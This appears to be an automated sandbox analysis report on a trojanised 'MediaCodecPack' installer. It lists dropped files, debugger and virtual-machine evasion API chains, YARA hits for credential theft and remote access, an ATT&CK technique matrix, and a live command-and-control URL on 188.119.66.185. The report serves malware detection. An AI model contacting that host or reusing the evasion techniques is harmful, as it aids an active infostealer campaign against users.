                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-GC9CG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FD66D.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5967
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-61654
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeAPI coverage: 4.8 %
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2160Thread sleep count: 5465 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2160Thread sleep time: -10930000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 6792Thread sleep time: -1320000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2160Thread sleep count: 4461 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2160Thread sleep time: -8922000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeThread delayed: delay time: 60000Jump to behavior
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.0000000000808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhg7
                    Source: mediacodecpack.exe, 00000003.00000002.2736393238.0000000003370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: mediacodecpack.exe, 00000003.00000002.2736393238.0000000003370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQ}
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeAPI call chain: ExitProcess graph end nodegraph_0-6764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeAPI call chain: ExitProcess graph end nodegraph_3-61453
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_3-61550
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_0040D6B9 rdtsc 3_2_0040D6B9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D53A08 _memset,IsDebuggerPresent,3_2_02D53A08
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D5E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02D5E6BE
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D45E5E RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,3_2_02D45E5E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D580E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02D580E8
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D4E85F cpuid 3_2_02D4E85F
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: GetLocaleInfoA,1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: GetLocaleInfoA,1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004585C8
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0045559C GetUserNameA,1_2_0045559C
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2735509305.0000000002CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mediacodecpack.exe PID: 2216, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2735509305.0000000002CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mediacodecpack.exe PID: 2216, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,3_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60963143
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,3_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,3_2_6096A38C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_609254B1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6094B407
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090F435 sqlite3_bind_parameter_index,3_2_6090F435
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,3_2_609255D4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609255FF sqlite3_bind_text,3_2_609255FF
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,3_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,3_2_6094B54C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60925686
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,3_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,3_2_609256E5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092562A sqlite3_bind_blob,3_2_6092562A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,3_2_60925655
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6094C64A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_609687A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,3_2_6092570B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F772
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,3_2_60925778
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090577D sqlite3_bind_parameter_name,3_2_6090577D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090576B sqlite3_bind_parameter_count,3_2_6090576B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,3_2_6094A894
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F883
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,3_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,3_2_6096281E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,3_2_6096583A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,3_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6094A92B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090EAE5 sqlite3_transfer_bindings,3_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,3_2_6095FB98
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,3_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_60969D75
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,3_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    5
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution
                    1
                    Bootkit
                    1
                    Access Token Manipulation
                    21
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS135
                    System Information Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets251
                    Security Software Discovery
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync121
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Hbq580QZAR.exe18%ReversingLabsWin32.Trojan.Munp
                    SourceDetectionScannerLabelLink
                    C:\ProgramData\MediaCodecPack\MediaCodecPack.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe100%Joe Sandbox ML
                    C:\ProgramData\MediaCodecPack\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-38DHO.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FD66D.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FG1GT.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-GC9CG.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-L8DJ5.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-TV2PJ.tmp3%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)3%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp3%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c325100%Avira URL Cloudmalware
                    https://188.119.66.185/p40%Avira URL Cloudsafe
                    https://188.119.66.185/d0%Avira URL Cloudsafe
